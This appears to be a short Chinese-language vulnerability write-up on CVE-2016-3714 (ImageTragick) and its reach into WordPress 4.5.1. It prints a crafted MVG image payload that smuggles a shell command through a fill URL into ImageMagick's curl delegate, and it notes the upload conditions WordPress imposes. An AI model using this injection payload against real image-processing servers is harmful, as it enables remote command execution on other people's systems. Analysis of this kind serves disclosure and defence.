CVE-2016-3714 and Wordpress 4.5.1 Remote Command Execute

摘要:

CVE-2016-3714

当构造类似于这样的图片时:

root@debian ~/e/ImageMagick# cat test.png
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|wall exploit; ")'
pop graphic-context

ImageMagick 读取这个图片后会通过delegate.c处理:

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

造成命令执行。 debug1

debug2

Wordpress 4.5.1 Remote Command Execute

Wordpress优先使用Imagick对上传的图片进行处理,但要求Author权限。 Wordpress会对上传的图片进行通过这_ajax_nonce 和 post_id进行验证,如果只上传了带有payload的图片无法触发漏洞,这里有具体触发方法magick1 magick2 magick3